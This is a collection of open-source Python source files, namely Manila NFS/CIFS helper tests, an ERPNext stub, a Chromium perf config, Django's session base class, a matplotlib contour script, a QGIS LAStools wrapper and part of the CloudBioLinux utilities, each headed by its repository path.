self).setUp() fake_utils.stub_out_utils_execute(self) self.fake_conf = manila.share.configuration.Configuration(None) self._ssh_exec = mock.Mock(return_value=('', '')) self._execute = mock.Mock(return_value=('', '')) self._helper = generic.NFSHelper(self._execute, self._ssh_exec, self.fake_conf) ip = '10.254.0.3' self.server = fake_compute.FakeServer( ip=ip, public_address=ip, instance_id='fake_instance_id') self.share_name = 'fake_share_name' def test_create_export(self): ret = self._helper.create_export(self.server, self.share_name) expected_location = ':'.join([self.server['public_address'], os.path.join(CONF.share_mount_path, self.share_name)]) self.assertEqual(ret, expected_location) @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_allow_access(self, data): self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') self._helper.allow_access( self.server, self.share_name, 'ip', data, '10.0.0.2') local_path = os.path.join(CONF.share_mount_path, self.share_name) self._ssh_exec.assert_has_calls([ mock.call(self.server, ['sudo', 'exportfs']), mock.call(self.server, ['sudo', 'exportfs', '-o', '%s,no_subtree_check' % data, ':'.join(['10.0.0.2', local_path])]) ]) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server) def test_allow_access_no_ip(self): self.assertRaises( exception.InvalidShareAccess, self._helper.allow_access, self.server, self.share_name, 'fake_type', 'fake_level', 'fake_rule') @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_deny_access(self, data): self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') local_path = os.path.join(CONF.share_mount_path, self.share_name) access = dict( access_to='10.0.0.2', access_type='ip', access_level=data) self._helper.deny_access(self.server, self.share_name, access) export_string = ':'.join(['10.0.0.2', local_path]) expected_exec = ['sudo', 'exportfs', '-u', export_string] self._ssh_exec.assert_called_once_with(self.server, expected_exec) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server) def test_sync_nfs_temp_and_perm_files(self): self._helper._sync_nfs_temp_and_perm_files(self.server) self._helper._ssh_exec.assert_called_once_with(self.server, mock.ANY) @ddt.data('/foo/bar', '5.6.7.8:/bar/quuz', '5.6.7.88:/foo/quuz') def test_get_exports_for_share(self, export_location): server = dict(public_address='1.2.3.4') result = self._helper.get_exports_for_share(server, export_location) path = export_location.split(':')[-1] self.assertEqual([':'.join([server['public_address'], path])], result) @ddt.data( {'public_address_with_suffix': 'foo'}, {'with_prefix_public_address': 'bar'}, {'with_prefix_public_address_and_with_suffix': 'quuz'}, {}) def test_get_exports_for_share_with_error(self, server): export_location = '1.2.3.4:/foo/bar' self.assertRaises( exception.ManilaException, self._helper.get_exports_for_share, server, export_location) @ddt.data('/foo/bar', '5.6.7.8:/foo/bar', '5.6.7.88:fake:/foo/bar') def test_get_share_path_by_export_location(self, export_location): result = self._helper.get_share_path_by_export_location( dict(), export_location) self.assertEqual('/foo/bar', result) def test_disable_access_for_maintenance(self): fake_maintenance_path = "fake.path" share_mount_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self.mock_object(self._helper, '_ssh_exec') self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) self._helper.disable_access_for_maintenance( self.server, self.share_name) self._helper._ssh_exec.assert_any_call( self.server, ['cat', const.NFS_EXPORTS_FILE, '| grep', self.share_name, '| sudo tee', fake_maintenance_path] ) self._helper._ssh_exec.assert_any_call( self.server, ['sudo', 'exportfs', '-u', share_mount_path] ) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server ) def test_restore_access_after_maintenance(self): fake_maintenance_path = "fake.path" self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) self.mock_object(self._helper, '_ssh_exec') self._helper.restore_access_after_maintenance( self.server, self.share_name) self._helper._ssh_exec.assert_called_once_with( self.server, ['cat', fake_maintenance_path, '| sudo tee -a', const.NFS_EXPORTS_FILE, '&& sudo exportfs -r', '&& sudo rm -f', fake_maintenance_path] ) @ddt.ddt class CIFSHelperTestCase(test.TestCase): """Test case for CIFS helper of generic driver.""" def setUp(self): super(CIFSHelperTestCase, self).setUp() self.server_details = {'instance_id': 'fake', 'public_address': '1.2.3.4', } self.share_name = 'fake_share_name' self.fake_conf = manila.share.configuration.Configuration(None) self._ssh_exec = mock.Mock(return_value=('', '')) self._execute = mock.Mock(return_value=('', '')) self._helper = generic.CIFSHelper(self._execute, self._ssh_exec, self.fake_conf) self.access = dict( access_level=const.ACCESS_LEVEL_RW, access_type='ip', access_to='1.1.1.1') def test_init_helper(self): self._helper.init_helper(self.server_details) self._helper._ssh_exec.assert_called_once_with( self.server_details, ['sudo', 'net', 'conf', 'list'], ) def test_create_export_share_does_not_exist(self): def fake_ssh_exec(*args, **kwargs): if 'showshare' in args[1]: raise exception.ProcessExecutionError() else: return ('', '') self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=fake_ssh_exec)) ret = self._helper.create_export(self.server_details, self.share_name) expected_location = '\\\\%s\\%s' % ( self.server_details['public_address'], self.share_name) self.assertEqual(ret, expected_location) share_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), mock.call( self.server_details, [ 'sudo', 'net', 'conf', 'addshare', self.share_name, share_path, 'writeable=y', 'guest_ok=y', ] ), mock.call(self.server_details, mock.ANY), ]) def test_create_export_share_exist_recreate_true(self): ret = self._helper.create_export(self.server_details, self.share_name, recreate=True) expected_location = '\\\\%s\\%s' % ( self.server_details['public_address'], self.share_name) self.assertEqual(ret, expected_location) share_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), mock.call( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name, ] ), mock.call( self.server_details, [ 'sudo', 'net', 'conf', 'addshare', self.share_name, share_path, 'writeable=y', 'guest_ok=y', ] ), mock.call(self.server_details, mock.ANY), ]) def test_create_export_share_exist_recreate_false(self): self.assertRaises( exception.ShareBackendException, self._helper.create_export, self.server_details, self.share_name, recreate=False, ) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), ]) def test_remove_export(self): self._helper.remove_export(self.server_details, self.share_name) self._helper._ssh_exec.assert_called_once_with( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name], ) def test_remove_export_forcibly(self): delshare_command = ['sudo', 'net', 'conf', 'delshare', self.share_name] def fake_ssh_exec(*args, **kwargs): if delshare_command == args[1]: raise exception.ProcessExecutionError() else: return ('', '') self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=fake_ssh_exec)) self._helper.remove_export(self.server_details, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name], ), mock.call( self.server_details, ['sudo', 'smbcontrol', 'all', 'close-share', self.share_name], ), ]) def test_allow_access_ip_exist(self): hosts = [self.access['access_to'], ] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self.assertRaises( exception.ShareAccessExists, self._helper.allow_access, self.server_details, self.share_name, self.access['access_type'], self.access['access_level'], self.access['access_to']) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_allow_access_ip_does_not_exist(self): hosts = [] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self._helper.allow_access( self.server_details, self.share_name, self.access['access_type'], self.access['access_level'], self.access['access_to']) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, hosts, self.share_name) def test_allow_access_wrong_type(self): self.assertRaises( exception.InvalidShareAccess, self._helper.allow_access, self.server_details, self.share_name, 'fake', const.ACCESS_LEVEL_RW, '1.1.1.1') @ddt.data(const.ACCESS_LEVEL_RO, 'fake') def test_allow_access_wrong_access_level(self, data): self.assertRaises( exception.InvalidShareAccessLevel, self._helper.allow_access, self.server_details, self.share_name, 'ip', data, '1.1.1.1') @ddt.data(const.ACCESS_LEVEL_RO, 'fake') def test_deny_access_unsupported_access_level(self, data): access = dict(access_to='1.1.1.1', access_level=data) self.mock_object(self._helper, '_get_allow_hosts') self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access(self.server_details, self.share_name, access) self.assertFalse(self._helper._get_allow_hosts.called) self.assertFalse(self._helper._set_allow_hosts.called) def test_deny_access_list_has_value(self): hosts = [self.access['access_to'], ] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, [], self.share_name) def test_deny_access_list_does_not_have_value(self): hosts = [] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_deny_access_force(self): self.mock_object( self._helper, '_get_allow_hosts', mock.Mock(side_effect=exception.ProcessExecutionError()), ) self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access, force=True) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_deny_access_not_force(self): def raise_process_execution_error(*args, **kwargs): raise exception.ProcessExecutionError() self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(side_effect=raise_process_execution_error)) self.mock_object(self._helper, '_set_allow_hosts') self.assertRaises( exception.ProcessExecutionError, self._helper.deny_access, self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) @ddt.data( '', '1.2.3.4:/nfs/like/export', '/1.2.3.4/foo', '\\1.2.3.4\\foo', '//1.2.3.4\\mixed_slashes_and_backslashes_one', '\\\\1.2.3.4/mixed_slashes_and_backslashes_two') def test__get_share_group_name_from_export_location(self, export_location): self.assertRaises( exception.InvalidShare, self._helper._get_share_group_name_from_export_location, export_location) @ddt.data('//5.6.7.8/foo', '\\\\5.6.7.8\\foo') def test_get_exports_for_share(self, export_location): server = dict(public_address='1.2.3.4') self.mock_object( self._helper, '_get_share_group_name_from_export_location', mock.Mock(side_effect=( self._helper._get_share_group_name_from_export_location))) result = self._helper.get_exports_for_share(server, export_location) expected_export_location = ['\\\\%s\\foo' % server['public_address']] self.assertEqual(expected_export_location, result) self._helper._get_share_group_name_from_export_location.\ assert_called_once_with(export_location) @ddt.data( {'public_address_with_suffix': 'foo'}, {'with_prefix_public_address': 'bar'}, {'with_prefix_public_address_and_with_suffix': 'quuz'}, {}) def test_get_exports_for_share_with_exception(self, server): export_location = '1.2.3.4:/foo/bar' self.assertRaises( exception.ManilaException, self._helper.get_exports_for_share, server, export_location) @ddt.data('//5.6.7.8/foo', '\\\\5.6.7.8\\foo') def test_get_share_path_by_export_location(self, export_location): fake_path = ' /bar/quuz\n ' fake_server = dict() self.mock_object( self._helper, '_ssh_exec', mock.Mock(return_value=(fake_path, 'fake'))) self.mock_object( self._helper, '_get_share_group_name_from_export_location', mock.Mock(side_effect=( self._helper._get_share_group_name_from_export_location))) result = self._helper.get_share_path_by_export_location( fake_server, export_location) self.assertEqual('/bar/quuz', result) self._helper._ssh_exec.assert_called_once_with( fake_server, ['sudo', 'net', 'conf', 'getparm', 'foo', 'path']) self._helper._get_share_group_name_from_export_location.\ assert_called_once_with(export_location) def test_disable_access_for_maintenance(self): allowed_hosts = ['test', 'test2'] maintenance_path = os.path.join( self._helper.configuration.share_mount_path, "%s.maintenance" % self.share_name) self.mock_object(self._helper, '_set_allow_hosts') self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=allowed_hosts)) self._helper.disable_access_for_maintenance( self.server_details, self.share_name) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, [], self.share_name) valid_cmd = ['echo', "'test test2'", '| sudo tee', maintenance_path] self._helper._ssh_exec.assert_called_once_with( self.server_details, valid_cmd) def test_restore_access_after_maintenance(self): fake_maintenance_path = "test.path" self.mock_object(self._helper, '_set_allow_hosts') self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=[("fake fake2", 0), "fake"])) self._helper.restore_access_after_maintenance( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, ['fake', 'fake2'], self.share_name) self._helper._ssh_exec.assert_any_call( self.server_details, ['cat', fake_maintenance_path]) self._helper._ssh_exec.assert_any_call( self.server_details, ['sudo rm -f', fake_maintenance_path])
gangadhar-kadam/mtn-erpnext
refs/heads/master
website/doctype/top_bar_item/top_bar_item.py
483
# ERPNext - web based ERP (http://erpnext.com) # Copyright (C) 2012 Web Notes Technologies Pvt Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals import webnotes class DocType: def __init__(self, d, dl): self.doc, self.doclist = d, dl
Pluto-tv/chromium-crosswalk
refs/heads/master
tools/perf/core/project_config.py
2
# Copyright (c) 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import os import sys sys.path.append(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, 'telemetry')) from telemetry import benchmark_runner top_level_dir = os.path.dirname(os.path.realpath( os.path.join(__file__, os.pardir))) config = benchmark_runner.ProjectConfig( top_level_dir=top_level_dir, benchmark_dirs=[os.path.join(top_level_dir, 'benchmarks')]) config.telemetry_dir = os.path.realpath(os.path.join( top_level_dir, os.pardir, 'telemetry'))
GhostThrone/django
refs/heads/master
django/contrib/sessions/backends/base.py
298
from __future__ import unicode_literals import base64 import logging import string from datetime import datetime, timedelta from django.conf import settings from django.contrib.sessions.exceptions import SuspiciousSession from django.core.exceptions import SuspiciousOperation from django.utils import timezone from django.utils.crypto import ( constant_time_compare, get_random_string, salted_hmac, ) from django.utils.encoding import force_bytes, force_text from django.utils.module_loading import import_string # session_key should not be case sensitive because some backends can store it # on case insensitive file systems. VALID_KEY_CHARS = string.ascii_lowercase + string.digits class CreateError(Exception): """ Used internally as a consistent exception type to catch from save (see the docstring for SessionBase.save() for details). """ pass class SessionBase(object): """ Base class for all Session classes. """ TEST_COOKIE_NAME = 'testcookie' TEST_COOKIE_VALUE = 'worked' def __init__(self, session_key=None): self._session_key = session_key self.accessed = False self.modified = False self.serializer = import_string(settings.SESSION_SERIALIZER) def __contains__(self, key): return key in self._session def __getitem__(self, key): return self._session[key] def __setitem__(self, key, value): self._session[key] = value self.modified = True def __delitem__(self, key): del self._session[key] self.modified = True def get(self, key, default=None): return self._session.get(key, default) def pop(self, key, default=None): self.modified = self.modified or key in self._session return self._session.pop(key, default) def setdefault(self, key, value): if key in self._session: return self._session[key] else: self.modified = True self._session[key] = value return value def set_test_cookie(self): self[self.TEST_COOKIE_NAME] = self.TEST_COOKIE_VALUE def test_cookie_worked(self): return self.get(self.TEST_COOKIE_NAME) == self.TEST_COOKIE_VALUE def delete_test_cookie(self): del self[self.TEST_COOKIE_NAME] def _hash(self, value): key_salt = "django.contrib.sessions" + self.__class__.__name__ return salted_hmac(key_salt, value).hexdigest() def encode(self, session_dict): "Returns the given session dictionary serialized and encoded as a string." serialized = self.serializer().dumps(session_dict) hash = self._hash(serialized) return base64.b64encode(hash.encode() + b":" + serialized).decode('ascii') def decode(self, session_data): encoded_data = base64.b64decode(force_bytes(session_data)) try: # could produce ValueError if there is no ':' hash, serialized = encoded_data.split(b':', 1) expected_hash = self._hash(serialized) if not constant_time_compare(hash.decode(), expected_hash): raise SuspiciousSession("Session data corrupted") else: return self.serializer().loads(serialized) except Exception as e: # ValueError, SuspiciousOperation, unpickling exceptions. If any of # these happen, just return an empty dictionary (an empty session). if isinstance(e, SuspiciousOperation): logger = logging.getLogger('django.security.%s' % e.__class__.__name__) logger.warning(force_text(e)) return {} def update(self, dict_): self._session.update(dict_) self.modified = True def has_key(self, key): return key in self._session def keys(self): return self._session.keys() def values(self): return self._session.values() def items(self): return self._session.items() def iterkeys(self): return self._session.iterkeys() def itervalues(self): return self._session.itervalues() def iteritems(self): return self._session.iteritems() def clear(self): # To avoid unnecessary persistent storage accesses, we set up the # internals directly (loading data wastes time, since we are going to # set it to an empty dict anyway). self._session_cache = {} self.accessed = True self.modified = True def is_empty(self): "Returns True when there is no session_key and the session is empty" try: return not bool(self._session_key) and not self._session_cache except AttributeError: return True def _get_new_session_key(self): "Returns session key that isn't being used." while True: session_key = get_random_string(32, VALID_KEY_CHARS) if not self.exists(session_key): break return session_key def _get_or_create_session_key(self): if self._session_key is None: self._session_key = self._get_new_session_key() return self._session_key def _validate_session_key(self, key): """ Key must be truthy and at least 8 characters long. 8 characters is an arbitrary lower bound for some minimal key security. """ return key and len(key) >= 8 def _get_session_key(self): return self.__session_key def _set_session_key(self, value): """ Validate session key on assignment. Invalid values will set to None. """ if self._validate_session_key(value): self.__session_key = value else: self.__session_key = None session_key = property(_get_session_key) _session_key = property(_get_session_key, _set_session_key) def _get_session(self, no_load=False): """ Lazily loads session from storage (unless "no_load" is True, when only an empty dict is stored) and stores it in the current instance. """ self.accessed = True try: return self._session_cache except AttributeError: if self.session_key is None or no_load: self._session_cache = {} else: self._session_cache = self.load() return self._session_cache _session = property(_get_session) def get_expiry_age(self, **kwargs): """Get the number of seconds until the session expires. Optionally, this function accepts `modification` and `expiry` keyword arguments specifying the modification and expiry of the session. """ try: modification = kwargs['modification'] except KeyError: modification = timezone.now() # Make the difference between "expiry=None passed in kwargs" and # "expiry not passed in kwargs", in order to guarantee not to trigger # self.load() when expiry is provided. try: expiry = kwargs['expiry'] except KeyError: expiry = self.get('_session_expiry') if not expiry: # Checks both None and 0 cases return settings.SESSION_COOKIE_AGE if not isinstance(expiry, datetime): return expiry delta = expiry - modification return delta.days * 86400 + delta.seconds def get_expiry_date(self, **kwargs): """Get session the expiry date (as a datetime object). Optionally, this function accepts `modification` and `expiry` keyword arguments specifying the modification and expiry of the session. """ try: modification = kwargs['modification'] except KeyError: modification = timezone.now() # Same comment as in get_expiry_age try: expiry = kwargs['expiry'] except KeyError: expiry = self.get('_session_expiry') if isinstance(expiry, datetime): return expiry if not expiry: # Checks both None and 0 cases expiry = settings.SESSION_COOKIE_AGE return modification + timedelta(seconds=expiry) def set_expiry(self, value): """ Sets a custom expiration for the session. ``value`` can be an integer, a Python ``datetime`` or ``timedelta`` object or ``None``. If ``value`` is an integer, the session will expire after that many seconds of inactivity. If set to ``0`` then the session will expire on browser close. If ``value`` is a ``datetime`` or ``timedelta`` object, the session will expire at that specific future time. If ``value`` is ``None``, the session uses the global session expiry policy. """ if value is None: # Remove any custom expiration for this session. try: del self['_session_expiry'] except KeyError: pass return if isinstance(value, timedelta): value = timezone.now() + value self['_session_expiry'] = value def get_expire_at_browser_close(self): """ Returns ``True`` if the session is set to expire when the browser closes, and ``False`` if there's an expiry date. Use ``get_expiry_date()`` or ``get_expiry_age()`` to find the actual expiry date/age, if there is one. """ if self.get('_session_expiry') is None: return settings.SESSION_EXPIRE_AT_BROWSER_CLOSE return self.get('_session_expiry') == 0 def flush(self): """ Removes the current session data from the database and regenerates the key. """ self.clear() self.delete() self._session_key = None def cycle_key(self): """ Creates a new session key, whilst retaining the current session data. """ data = self._session_cache key = self.session_key self.create() self._session_cache = data self.delete(key) # Methods that child classes must implement. def exists(self, session_key): """ Returns True if the given session_key already exists. """ raise NotImplementedError('subclasses of SessionBase must provide an exists() method') def create(self): """ Creates a new session instance. Guaranteed to create a new object with a unique key and will have saved the result once (with empty data) before the method returns. """ raise NotImplementedError('subclasses of SessionBase must provide a create() method') def save(self, must_create=False): """ Saves the session data. If 'must_create' is True, a new session object is created (otherwise a CreateError exception is raised). Otherwise, save() can update an existing object with the same key. """ raise NotImplementedError('subclasses of SessionBase must provide a save() method') def delete(self, session_key=None): """ Deletes the session data under this key. If the key is None, the current session key value is used. """ raise NotImplementedError('subclasses of SessionBase must provide a delete() method') def load(self): """ Loads the session data and returns a dictionary. """ raise NotImplementedError('subclasses of SessionBase must provide a load() method') @classmethod def clear_expired(cls): """ Remove expired sessions from the session store. If this operation isn't possible on a given backend, it should raise NotImplementedError. If it isn't necessary, because the backend has a built-in expiration mechanism, it should be a no-op. """ raise NotImplementedError('This backend does not support clear_expired().')
jonkrohn/study-group
refs/heads/master
neural-networks-and-deep-learning/fig/misleading_gradient_contours.py
4
""" misleading_gradient_contours ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Plots the contours of the function from misleading_gradient.py""" #### Libraries # Third party libraries import matplotlib.pyplot as plt import numpy X = numpy.arange(-1, 1, 0.02) Y = numpy.arange(-1, 1, 0.02) X, Y = numpy.meshgrid(X, Y) Z = X**2 + 10*Y**2 plt.figure() CS = plt.contour(X, Y, Z, levels=[0.5, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0]) plt.xlabel("$w_1$", fontsize=16) plt.ylabel("$w_2$", fontsize=16) plt.show()
Gaia3D/QGIS
refs/heads/master
python/plugins/processing/algs/lidar/lastools/lasoverlap.py
9
# -*- coding: utf-8 -*- """ *************************************************************************** lasoverlap.py --------------------- Date : September 2013 Copyright : (C) 2013 by Martin Isenburg Email : martin near rapidlasso point com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Martin Isenburg' __date__ = 'September 2013' __copyright__ = '(C) 2013, Martin Isenburg' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' import os from LAStoolsUtils import LAStoolsUtils from LAStoolsAlgorithm import LAStoolsAlgorithm from processing.core.parameters import ParameterBoolean from processing.core.parameters import ParameterNumber from processing.core.parameters import ParameterSelection class lasoverlap(LAStoolsAlgorithm): CHECK_STEP = "CHECK_STEP" ATTRIBUTE = "ATTRIBUTE" OPERATION = "OPERATION" ATTRIBUTES = ["elevation", "intensity", "number_of_returns", "scan_angle_abs", "density"] OPERATIONS = ["lowest", "highest", "average"] CREATE_OVERLAP_RASTER = "CREATE_OVERLAP_RASTER" CREATE_DIFFERENCE_RASTER = "CREATE_DIFFERENCE_RASTER" def defineCharacteristics(self): self.name = "lasoverlap" self.group = "LAStools" self.addParametersVerboseGUI() self.addParametersPointInputGUI() self.addParametersFilter1ReturnClassFlagsGUI() self.addParameter(ParameterNumber(lasoverlap.CHECK_STEP, self.tr("size of grid used for overlap check"), 0, None, 2.0)) self.addParameter(ParameterSelection(lasoverlap.ATTRIBUTE, self.tr("attribute to check"), lasoverlap.ATTRIBUTES, 0)) self.addParameter(ParameterSelection(lasoverlap.OPERATION, self.tr("operation on attribute per cell"), lasoverlap.OPERATIONS, 0)) self.addParameter(ParameterBoolean(lasoverlap.CREATE_OVERLAP_RASTER, self.tr("create overlap raster"), True)) self.addParameter(ParameterBoolean(lasoverlap.CREATE_DIFFERENCE_RASTER, self.tr("create difference raster"), True)) self.addParametersRasterOutputGUI() self.addParametersAdditionalGUI() def processAlgorithm(self, progress): commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasoverlap")] self.addParametersVerboseCommands(commands) self.addParametersPointInputCommands(commands) self.addParametersFilter1ReturnClassFlagsCommands(commands) step = self.getParameterValue(lasoverlap.CHECK_STEP) if step != 0.0: commands.append("-step") commands.append(str(step)) commands.append("-values") attribute = self.getParameterValue(lasoverlap.ATTRIBUTE) if attribute != 0: commands.append("-" + lasoverlap.ATTRIBUTES[attribute]) operation = self.getParameterValue(lasoverlap.OPERATION) if operation != 0: commands.append("-" + lasoverlap.OPERATIONS[operation]) if not self.getParameterValue(lasoverlap.CREATE_OVERLAP_RASTER): commands.append("-no_over") if not self.getParameterValue(lasoverlap.CREATE_DIFFERENCE_RASTER): commands.append("-no_diff") self.addParametersRasterOutputCommands(commands) self.addParametersAdditionalCommands(commands) LAStoolsUtils.runLAStools(commands, progress)
kdaily/cloudbiolinux
refs/heads/master
cloudbio/utils.py
10
"""Utilities for logging and progress tracking. """ import logging import os import sys from fabric.main import load_settings from fabric.colors import yellow, red, green, magenta from fabric.api import settings, hide, cd, run from fabric.contrib.files import exists from cloudbio.distribution import _setup_distribution_environment from cloudbio.flavor import Flavor from cloudbio.flavor.config import get_config_file class ColorFormatter(logging.Formatter): """ Format log message based on the message level http://stackoverflow.com/questions/1343227/can-pythons-logging-format-be-modified-depending-on-the-message-log-level """ # Setup formatters for each of the levels err_fmt = red("ERR [%(filename)s(%(lineno)d)] %(msg)s") warn_fmt = magenta("WARN [%(filename)s(%(lineno)d)]: %(msg)s") dbg_fmt = yellow("DBG [%(filename)s]: %(msg)s") info_fmt = green("INFO: %(msg)s") def __init__(self, fmt="%(name)s %(levelname)s: %(msg)s"): logging.Formatter.__init__(self, fmt) def format(self, record): # Save the original format configured by the user # when the logger formatter was instantiated format_orig = self._fmt # Replace the original format with one customized by logging level if record.levelno == 10: # DEBUG self._fmt = ColorFormatter.dbg_fmt elif record.levelno == 20: # INFO self._fmt = ColorFormatter.info_fmt elif record.levelno == 30: # WARN self._fmt = ColorFormatter.warn_fmt elif record.levelno == 40: # ERROR self._fmt = ColorFormatter.err_fmt # Call the original formatter class to do the grunt work result = logging.Formatter.format(self, record) # Restore the original format configured by the user self._fmt = format_orig return result def _setup_logging(env): env.logger = logging.getLogger("cloudbiolinux") env.logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # Use custom formatter ch.setFormatter(ColorFormatter()) env.logger.addHandler(ch) def _update_biolinux_log(env, target, flavor): """Updates the VM so it contains information on the latest BioLinux update in /var/log/biolinux.log. The latest information is appended to the file and can be used to see if an installation/update has completed (see also ./test/test_vagrant). """ if not target: target = env.get("target", None) if not target: target = "unknown" else: target = target.name if not flavor: flavor = env.get("flavor", None) if not flavor: flavor = "unknown" else: flavor = flavor.name logfn = "/var/log/biolinux.log" info = "Target="+target+"; Flavor="+flavor env.logger.info(info) if env.use_sudo: env.safe_sudo("date +\"%D %T - Updated "+info+"\" >> "+logfn) def _configure_fabric_environment(env, flavor=None, fabricrc_loader=None, ignore_distcheck=False): if not fabricrc_loader: fabricrc_loader = _parse_fabricrc _setup_flavor(env, flavor) fabricrc_loader(env) # get parameters for distro, packages etc. _setup_distribution_environment(ignore_distcheck=ignore_distcheck) _create_local_paths(env) def _setup_flavor(env, flavor): """Setup a flavor, providing customization hooks to modify CloudBioLinux installs. Specify flavor as a name, in which case we look it up in the standard flavor directory (contrib/flavor/your_flavor), or as an absolute path to a flavor directory outside of cloudbiolinux. """ env.flavor = Flavor(env) env.flavor_dir = None if flavor: # set the directory for flavor customizations if os.path.isabs(flavor) or os.path.exists(flavor): flavor_dir = flavor else: flavor_dir = os.path.join(os.path.dirname(__file__), '..', 'contrib', 'flavor', flavor) assert os.path.exists(flavor_dir), \ "Did not find directory {0} for flavor {1}".format(flavor_dir, flavor) env.flavor_dir = flavor_dir flavor_name = os.path.split(flavor_dir)[-1] # Reinstantiate class if custom defined import cloudbio.flavor try: env.flavor = getattr(cloudbio.flavor, flavor_name.capitalize())(env) except AttributeError: pass env.flavor.name = flavor_name # Load python customizations to base configuration if present for ext in ["", "flavor"]: py_flavor = os.path.split(os.path.realpath(flavor_dir))[1] + ext flavor_custom_py = os.path.join(flavor_dir, "{0}.py".format(py_flavor)) if os.path.exists(flavor_custom_py): sys.path.append(flavor_dir) mod = __import__(py_flavor, fromlist=[py_flavor]) env.logger.info(env.flavor) env.logger.info("This is a %s flavor" % env.flavor.name) def _parse_fabricrc(env): """Defaults from fabricrc.txt file; loaded if not specified at commandline. """ env.config_dir = os.path.join(os.path.dirname(__file__), "..", "config") env.tool_data_table_conf_file = os.path.join(env.config_dir, "..", "installed_files", "tool_data_table_conf.xml") if not env.has_key("distribution") and not env.has_key("system_install"): env.logger.info("Reading default fabricrc.txt") env.update(load_settings(get_config_file(env, "fabricrc.txt").base)) if "shell_config" not in env: env.shell_config = "~/.bashrc" if "shell" not in env: env.shell = "/bin/bash -i -c" def _create_local_paths(env): """Expand any paths defined in terms of shell shortcuts (like ~). """ with settings(hide('warnings', 'running', 'stdout', 'stderr'), warn_only=True): # This is the first point we call into a remote host - make sure # it does not fail silently by calling a dummy run env.logger.info("Now, testing connection to host...") test = env.safe_run("pwd") # If there is a connection failure, the rest of the code is (sometimes) not # reached - for example with Vagrant the program just stops after above run # command. if test != None: env.logger.info("Connection to host appears to work!") else: raise NotImplementedError("Connection to host failed") env.logger.debug("Expand paths") if "local_install" in env: if not env.safe_exists(env.local_install): env.safe_sudo("mkdir -p %s" % env.local_install) user = env.safe_run_output("echo $USER") env.safe_sudo("chown -R 